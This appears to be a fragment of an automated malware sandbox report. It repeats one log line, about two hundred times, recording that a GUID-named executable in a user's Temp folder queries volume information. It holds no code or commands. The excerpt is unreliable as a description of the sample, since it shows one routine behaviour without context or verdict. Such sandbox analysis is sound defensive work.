              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
              Source: C:\Users\user\AppData\Local\Temp\40279737-1c0a-47e7-b4ac-3a849a46e40d.exeQueries volume information: unknown VolumeInformation
